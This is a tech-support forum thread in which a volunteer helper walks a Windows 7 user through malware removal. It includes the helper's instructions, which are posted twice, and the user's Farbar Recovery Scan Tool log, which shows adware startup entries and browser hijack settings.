[Khazard]

Just recently, I was bombarded with adware on my Google Chrome and had to do a lot of clean with AdwCleaner and MalwareBytes. I think AdwCleaner did the job and removed all possible adware and now I'm left with this error message popping up everytime my system reboots. 

I recently went through this topic and realized this issue can be solved. Any solutions will be much appreciated.

[Advertisements]

Hello and welcome to Geeks To Go! My nickname is Pystryker , and I will be helping you with your issue today.


Before we get started, I have a few things I need to go over with you

• If you are receiving help for this issue at another forum, please let me know so I can close this thread.
• Please download to and run all requested tools from your Desktop.
• Please do not install any new software during the cleaning process other than the tools I provide for you. This can hinder the cleaning process.
• At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly" This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
• If any of your security programs give you a warning about any tool I ask you to use, please do not worry. All the links and tools I provide to you will be safe.
• Please do not run any tools other than the ones I ask you to, when I ask you to. Some of these tools can be very dangerous if used improperly. Also, if you use a tool that I have not requested you use, it can cause false positives, thereby delaying the complete cleaning of your machine.
• This is a complicated process. It requires several steps, patience, and careful following of my instructions in the order they are given to diagnose your problems to get your machine back in working order.
• Please stay with me until the end of all steps and procedures and I declare your system clean. Just because there is a lack of symptoms does not indicate a clean machine. I promise to do the same for you.
• It is impossible for me to know what interactions may happen between your computer's software and the tools we will use to clean your machine. Therefore, I highly recommend you backup any critical personal files on your machine before we start.
• If you have any questions at all, please don't hesitate to ask. There's no such thing as a stupid question when dealing with malware.
• If you are unsure of an instruction I give you, or if something unexpected occurs, Do NOT proceed! Stop and ask for clarification of the instruction or tell me what occurred.
• Please remember, the fixes are for your machine and your machine ONLY! Do not use these fixes on any other machine, each fix is tailor made for your system only. Using a fix on another machine can and will cause serious damage.
• Once we have cleaned your machine, we'll have some cleanup and prevention steps to go through. We will also provide you with some information about how to reduce your chances of infection and get some protections in place to help defend you against this in the future
• Please be patient while I am analyzing your logs. I know you are probably scared and very frustrated with this problem, but I am a volunteer and sometimes life does get in the way.

Special note: Please know that I am against pirating software in any form. Having pirated software on your machine is a direct violation of the Terms of Service you agreed to when creating your account. This includes programs such as KMS for activating illegal copies of Microsoft products. If pirated software is found on your machine, you will be asked to remove it. Refusing to do so will result in termination of assistance with your malware issues.


Now, let's get started, shall we?


Step 1: Scan with Farbar's Recovery Scan Tool (FRST)

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

• Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
• Place a check in the box marked Addition.txt
  
  
• Press the Scan button.
• It will produce a log called FRST.txt in the same directory the tool is run from.
• Please copy and paste log back here.
• The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.

Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

FRST Log

Addition.txt Log

[pystryker]

Hello and welcome to Geeks To Go! My nickname is Pystryker , and I will be helping you with your issue today.


Before we get started, I have a few things I need to go over with you

• If you are receiving help for this issue at another forum, please let me know so I can close this thread.
• Please download to and run all requested tools from your Desktop.
• Please do not install any new software during the cleaning process other than the tools I provide for you. This can hinder the cleaning process.
• At the top of your post, please click on the "Follow this topic" button and make sure that the "Received notification" box is checked and set to "Instantly" This will send an email to you as soon as I reply to your topic, allowing us to solve your problem faster.
• If any of your security programs give you a warning about any tool I ask you to use, please do not worry. All the links and tools I provide to you will be safe.
• Please do not run any tools other than the ones I ask you to, when I ask you to. Some of these tools can be very dangerous if used improperly. Also, if you use a tool that I have not requested you use, it can cause false positives, thereby delaying the complete cleaning of your machine.
• This is a complicated process. It requires several steps, patience, and careful following of my instructions in the order they are given to diagnose your problems to get your machine back in working order.
• Please stay with me until the end of all steps and procedures and I declare your system clean. Just because there is a lack of symptoms does not indicate a clean machine. I promise to do the same for you.
• It is impossible for me to know what interactions may happen between your computer's software and the tools we will use to clean your machine. Therefore, I highly recommend you backup any critical personal files on your machine before we start.
• If you have any questions at all, please don't hesitate to ask. There's no such thing as a stupid question when dealing with malware.
• If you are unsure of an instruction I give you, or if something unexpected occurs, Do NOT proceed! Stop and ask for clarification of the instruction or tell me what occurred.
• Please remember, the fixes are for your machine and your machine ONLY! Do not use these fixes on any other machine, each fix is tailor made for your system only. Using a fix on another machine can and will cause serious damage.
• Once we have cleaned your machine, we'll have some cleanup and prevention steps to go through. We will also provide you with some information about how to reduce your chances of infection and get some protections in place to help defend you against this in the future
• Please be patient while I am analyzing your logs. I know you are probably scared and very frustrated with this problem, but I am a volunteer and sometimes life does get in the way.

Special note: Please know that I am against pirating software in any form. Having pirated software on your machine is a direct violation of the Terms of Service you agreed to when creating your account. This includes programs such as KMS for activating illegal copies of Microsoft products. If pirated software is found on your machine, you will be asked to remove it. Refusing to do so will result in termination of assistance with your malware issues.


Now, let's get started, shall we?


Step 1: Scan with Farbar's Recovery Scan Tool (FRST)

Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

• Right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
• Place a check in the box marked Addition.txt
  
  
• Press the Scan button.
• It will produce a log called FRST.txt in the same directory the tool is run from.
• Please copy and paste log back here.
• The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.

Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

FRST Log

Addition.txt Log

[Khazard]

FRST log: 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 22-04-2017

Ran by HP (administrator) on HP-PC (22-04-2017 16:55:45)

Running from C:\Users\HP\Desktop

Loaded Profiles: HP (Available Profiles: HP)

Platform: Windows 7 Professional (X64) Language: English (United States)

Internet Explorer Version 8 (Default browser: Chrome)

Boot Mode: Normal

Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

 

==================== Processes (Whitelisted) =================

 

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

 

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe

(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe

(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE

(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE

(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.3\GoogleCrashHandler.exe

(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.33.3\GoogleCrashHandler64.exe

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe

(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe

(Microsoft Corporation) C:\Windows\System32\rundll32.exe

(Intel Corporation) C:\Windows\System32\igfxHK.exe

(Intel Corporation) C:\Windows\System32\igfxTray.exe

(Microsoft Corporation) C:\Program Files\Microsoft Security Client\msseces.exe

(BitTorrent Inc.) C:\Users\HP\AppData\Roaming\uTorrent\uTorrent.exe

(Skillbrains) C:\Program Files (x86)\Skillbrains\lightshot\5.3.0.0\Lightshot.exe

(BitTorrent Inc.) C:\Users\HP\AppData\Roaming\uTorrent\updates\3.4.9_43388\utorrentie.exe

(BitTorrent Inc.) C:\Users\HP\AppData\Roaming\uTorrent\updates\3.4.9_43388\utorrentie.exe

() C:\Program Files\AutoHotkey\AutoHotkey.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

 

==================== Registry (Whitelisted) ====================

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

 

HKLM\...\Run: [MSC] => C:\Program Files\Microsoft Security Client\msseces.exe [1337000 2015-04-30] (Microsoft Corporation)

HKLM-x32\...\Run: [Lightshot] => C:\Program Files (x86)\Skillbrains\lightshot\Lightshot.exe [226560 2014-10-16] ()

HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [587288 2016-09-22] (Oracle Corporation)

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [55357464 2015-09-04] (Skype Technologies S.A.)

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [uTorrent] => C:\Users\HP\AppData\Roaming\uTorrent\uTorrent.exe [2147520 2017-03-14] (BitTorrent Inc.)

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3019552 2017-03-23] (Valve Corporation)

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [RGSC] => C:\Program Files (x86)\Rockstar Games\Rockstar Games Social Club\RGSCLauncher.exe /silent

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Discord] => C:\Users\HP\AppData\Local\Discord\app-0.0.297\Discord.exe

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\Run: [Etzption] => regsvr32.exe C:\Users\HP\AppData\Local\Etzption\kgnxycpl.dll <===== ATTENTION

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\...\MountPoints2: F - F:\Setup.exe

HKU\S-1-5-18\...\Run: [oALSusVMb8.exe] => C:\Program Files\MSBuild\TFEMS13WF30E\oALSusVMb8.exe [444928 2017-04-21] (tachba3)

 

==================== Internet (Whitelisted) ====================

 

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

 

Tcpip\Parameters: [DhcpNameServer] 41.212.0.100 41.212.0.101

Tcpip\..\Interfaces\{4ED56D3C-8DAE-4F80-93CC-907F3CAC181A}: [NameServer] 8.8.8.8,8.8.4.4

Tcpip\..\Interfaces\{4ED56D3C-8DAE-4F80-93CC-907F3CAC181A}: [DhcpNameServer] 41.212.0.100 41.212.0.101

Tcpip\..\Interfaces\{7E37DC77-5ECC-4B66-8019-685EFD3768FB}: [DhcpNameServer] 41.212.0.100 41.212.0.101

 

Internet Explorer:

==================

HKU\S-1-5-21-1988295413-3700943990-1798627009-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/?ocid=iehp

SearchScopes: HKLM-x32 -> DefaultScope value is missing

BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)

BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)

BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)

BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)

BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)

BHO-x32: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\Office15\OCHelper.dll [2012-10-01] (Microsoft Corporation)

BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\ssv.dll [2016-10-22] (Oracle Corporation)

BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2012-07-17] (Microsoft Corp.)

BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office15\URLREDIR.DLL [2012-10-01] (Microsoft Corporation)

BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\Office15\GROOVEEX.DLL [2012-10-01] (Microsoft Corporation)

BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\jp2ssv.dll [2016-10-22] (Oracle Corporation)

Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2016-01-08] (Microsoft Corporation)

Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2016-01-08] (Microsoft Corporation)

Filter: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation)

Filter-x32: deflate - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation)

Filter: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\system32\urlmon.dll [2009-07-14] (Microsoft Corporation)

Filter-x32: gzip - {8f6b0360-b80d-11d0-a9b3-006097942311} - C:\Windows\SysWOW64\urlmon.dll [2009-07-14] (Microsoft Corporation)

StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe hxxp://www.istartsurf.com/?type=sc&ts=1442127735&z=8f6c8bea7b47c1abc4c3a41g0z6z1o2g1o8m5wdm1b&from=cor&uid=WDCXWD5000LPVX-60V0TT0_WD-WX61AB404E2U04E2U

 

FireFox:

========

FF DefaultProfile: 48lgjav6.default

FF ProfilePath: C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\48lgjav6.default [2017-04-21]

FF Homepage: Mozilla\Firefox\Profiles\48lgjav6.default -> C:\ProgramData\Plusdaxs\ff.HP

FF NewTab: Mozilla\Firefox\Profiles\48lgjav6.default -> C:\ProgramData\Plusdaxs\ff.NT

FF Extension: (System.Runtime.InteropServices.ComRegisterFunctionAttribute) - C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\48lgjav6.default\Extensions\{63086783-BD70-059F-3F70-5CF11841DE4D} [2017-04-21] [not signed]

FF SearchPlugin: C:\Users\HP\AppData\Roaming\Mozilla\Firefox\Profiles\48lgjav6.default\searchplugins\findit.xml [2017-04-21]

FF Plugin-x32: @java.com/DTPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\dtplugin\npDeployJava1.dll [2016-10-22] (Oracle Corporation)

FF Plugin-x32: @java.com/JavaPlugin,version=11.111.2 -> C:\Program Files (x86)\Java\jre1.8.0_111\bin\plugin2\npjp2.dll [2016-10-22] (Oracle Corporation)

FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [No File]

FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office15\NPSPWRAP.DLL [2012-10-01] (Microsoft Corporation)

FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)

FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)

FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.3\npGoogleUpdate3.dll [2017-04-12] (Google Inc.)

FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)

FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)

FF Plugin HKU\S-1-5-21-1988295413-3700943990-1798627009-1000: ubisoft.com/uplaypc -> C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [No File]

 

Chrome: 

=======

CHR HomePage: Default -> hxxps://%66%65%65%64.%73%6E%61%70%64%6F.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGIjVkxlyIP4NYe17aVLWoBGdpVDR-BTSrQsGi8yyr8td-LCWCtYq86UsssjajJ8KKld5TANCXyBiNR4ojSWvV34p5tmV7J1vo8MahiLaLWxx2yyMLKa9s7rWriIZxYDWkmExYEPhxkurmILopi0NJUDP3alUzvEqs6VY743GvE6pqAiXqcBAUFopR6Xo

CHR NewTab: Default ->  Active:"chrome-extension://jpfpebmajhhopeonhlcgidhclcccjcik/newtab.html"

CHR Profile: C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default [2017-04-22]

CHR Extension: (Google Slides) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2017-04-07]

CHR Extension: (Google Docs) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2017-04-07]

CHR Extension: (Adblock Plus) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\cfhdojbkjhnklbpkdaibdccddilifddb [2017-04-07]

CHR Extension: (Adobe Acrobat) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2017-04-07]

CHR Extension: (Google Sheets) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2017-04-07]

CHR Extension: (Google Docs Offline) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2017-04-07]

CHR Extension: (Speed Dial 2) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\jpfpebmajhhopeonhlcgidhclcccjcik [2017-04-07]

CHR Extension: (Chrome Web Store Payments) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-04-07]

CHR Extension: (Material Simple Dark Grey) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\ookepigabmicjpgfnmncjiplegcacdbm [2017-04-21]

CHR Extension: (Gmail) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2017-04-07]

CHR Extension: (Chrome Media Router) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-04-07]

CHR Extension: (Canvas Rider) - C:\Users\HP\AppData\Local\Google\Chrome\User Data\Default\Extensions\poknhlcknimnnbfcombaooklofipaibk [2017-04-07]

CHR HKU\.DEFAULT\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2016-01-08]

 

==================== Services (Whitelisted) ====================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

R2 c2cautoupdatesvc; C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [1433216 2016-01-08] (Microsoft Corporation)

R2 c2cpnrsvc; C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [1773696 2016-01-08] (Microsoft Corporation)

S3 EasyAntiCheat; C:\Windows\SysWOW64\EasyAntiCheat.exe [236832 2015-10-21] (EasyAntiCheat Ltd)

S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe [69632 2005-04-04] (Macrovision Corporation) [File not signed]

R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [282096 2014-02-24] (Intel Corporation)

R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23816 2015-04-30] (Microsoft Corporation)

R3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [366544 2015-04-30] (Microsoft Corporation)

S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Corporation)

 

===================== Drivers (Whitelisted) ======================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

S2 atksgt; C:\Windows\System32\DRIVERS\atksgt.sys [303616 2017-02-25] () [File not signed]

R3 btUrbFilterDrv; C:\Windows\System32\Drivers\IvtUrbBtFlt.sys [50272 2013-12-16] (Ralink Corporation)

R2 lirsgt; C:\Windows\System32\DRIVERS\lirsgt.sys [43168 2015-09-26] ()

R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [100312 2013-12-10] (Intel Corporation)

R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [280376 2015-03-04] (Microsoft Corporation)

R2 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [124568 2015-03-04] (Microsoft Corporation)

R3 RSP2STOR; C:\Windows\System32\DRIVERS\RtsP2Stor.sys [293592 2014-04-16] (Realtek Semiconductor Corp.)

R3 rtbth; C:\Windows\System32\DRIVERS\rtbth.sys [1205448 2014-04-30] (Ralink Technology, Corp.)

R3 SmbDrvI; C:\Windows\System32\DRIVERS\Smb_driver_Intel.sys [31472 2014-05-05] (Synaptics Incorporated)

R1 {df06148f-d289-4e33-a087-33e2aa940789}Gw64; C:\Windows\System32\drivers\{df06148f-d289-4e33-a087-33e2aa940789}Gw64.sys [48784 2015-09-12] () [File not signed]

 

==================== NetSvcs (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

 

==================== One Month Created files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2017-04-22 16:55 - 2017-04-22 16:56 - 00016273 _____ C:\Users\HP\Desktop\FRST.txt

2017-04-22 16:55 - 2017-04-22 16:55 - 00000000 ____D C:\FRST

2017-04-22 16:54 - 2017-04-22 16:55 - 02425344 _____ (Farbar) C:\Users\HP\Desktop\FRST64.exe

2017-04-22 12:30 - 2017-04-22 12:30 - 00000000 ____D C:\ProgramData\Electronic Arts

2017-04-21 15:44 - 2017-04-21 15:44 - 00001220 _____ C:\Users\HP\Desktop\OBS Studio (32bit).lnk

2017-04-21 15:41 - 2017-04-21 21:26 - 00000000 ____D C:\Users\HP\AppData\Roaming\obs-studio

2017-04-21 15:40 - 2017-04-21 15:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OBS Studio

2017-04-21 15:39 - 2017-04-21 15:40 - 00000000 ____D C:\Program Files (x86)\obs-studio

2017-04-21 08:51 - 2017-04-22 08:31 - 00000000 ____D C:\Program Files (x86)\pccleanplus

2017-04-21 08:51 - 2017-04-21 08:51 - 00000037 _____ C:\Windows\wininit.ini

2017-04-21 08:50 - 2017-04-21 08:50 - 00000000 ____D C:\Program Files (x86)\ParentalControl

2017-04-21 08:45 - 2017-04-22 08:31 - 00000000 ____D C:\Program Files (x86)\51dc062d-c4d5-4a36-8902-edc3d32064671492753523

2017-04-19 16:18 - 2017-04-19 16:18 - 00000000 ____D C:\Users\HP\AppData\Local\modloader

2017-04-19 10:41 - 2017-04-22 13:43 - 00061811 _____ C:\Windows\icm32.exe

2017-04-19 10:41 - 2017-04-19 10:41 - 00003320 _____ C:\Windows\System32\Tasks\RegIdleBackup

2017-04-08 18:58 - 2017-04-12 06:46 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe

2017-04-08 18:58 - 2017-04-12 06:46 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

2017-04-08 18:58 - 2017-04-12 06:46 - 00004462 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier

2017-04-08 18:58 - 2017-04-12 06:46 - 00004324 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater

2017-04-08 18:57 - 2017-04-12 06:45 - 00000000 ____D C:\Windows\system32\Macromed

2017-04-07 21:35 - 2017-04-07 22:06 - 00001708 _____ C:\Users\Public\Desktop\League of Legends.lnk

2017-04-07 21:35 - 2017-04-07 21:35 - 00000000 ____D C:\Riot Games

2017-04-07 21:35 - 2017-04-07 21:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\League of Legends

2017-04-07 20:02 - 2017-04-22 08:19 - 00002356 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk

2017-04-07 19:59 - 2017-04-12 06:46 - 00003330 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA

2017-04-07 19:59 - 2017-04-12 06:46 - 00003202 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore

2017-04-07 18:55 - 2017-04-07 18:55 - 00000000 ____D C:\Users\HP\AppData\Local\CrashDumps

2017-04-07 17:33 - 2017-04-07 17:33 - 00000000 ____D C:\Users\HP\AppData\Roaming\Opera Software

2017-04-07 13:20 - 2017-04-07 13:20 - 00000000 ____D C:\ProgramData\Malwarebytes

2017-04-07 07:36 - 2017-04-22 08:56 - 00000000 ____D C:\Users\HP\AppData\LocalLow\uTorrent

2017-04-02 12:38 - 2015-07-02 12:05 - 00218112 _____ C:\Users\HP\Desktop\IMRP.Launcher.exe

2017-03-28 11:07 - 2017-04-07 19:53 - 00000000 ____D C:\Program Files (x86)\Mr DJ

2017-03-25 13:57 - 2017-03-25 13:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PowerISO

2017-03-25 13:14 - 2017-03-25 13:53 - 00000000 ____D C:\Users\HP\AppData\LocalLow\Mozilla

2017-03-25 13:14 - 2017-03-25 13:19 - 00000000 ____D C:\Users\HP\AppData\Local\Mozilla

2017-03-25 13:14 - 2017-03-25 13:14 - 00000000 ____D C:\Users\HP\AppData\Roaming\Mozilla

2017-03-23 16:26 - 2017-04-07 17:48 - 00000000 ____D C:\Users\HP\AppData\Local\Opera Software

2017-03-23 16:24 - 2017-03-23 16:31 - 00000000 ____D C:\Program Files\Opera

 

==================== One Month Modified files and folders ========

 

(If an entry is included in the fixlist, the file/folder will be moved.)

 

2017-04-22 16:56 - 2015-10-25 08:09 - 00000000 ____D C:\Users\HP\AppData\Roaming\uTorrent

2017-04-22 16:53 - 2015-10-31 18:13 - 00000000 ____D C:\Program Files (x86)\Steam

2017-04-22 16:34 - 2015-11-19 19:41 - 00000382 _____ C:\Windows\Tasks\update-sys.job

2017-04-22 15:43 - 2015-11-19 19:41 - 00000382 _____ C:\Windows\Tasks\update-S-1-5-21-1988295413-3700943990-1798627009-1000.job

2017-04-22 12:57 - 2015-09-21 16:58 - 00000000 ____D C:\Users\HP\Documents\FIFA 14

2017-04-22 09:03 - 2009-07-14 07:45 - 00020688 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

2017-04-22 09:03 - 2009-07-14 07:45 - 00020688 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

2017-04-22 08:56 - 2009-07-14 08:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT

2017-04-22 08:38 - 2015-09-12 19:41 - 00000000 ____D C:\Users\HP\AppData\Roaming\Skype

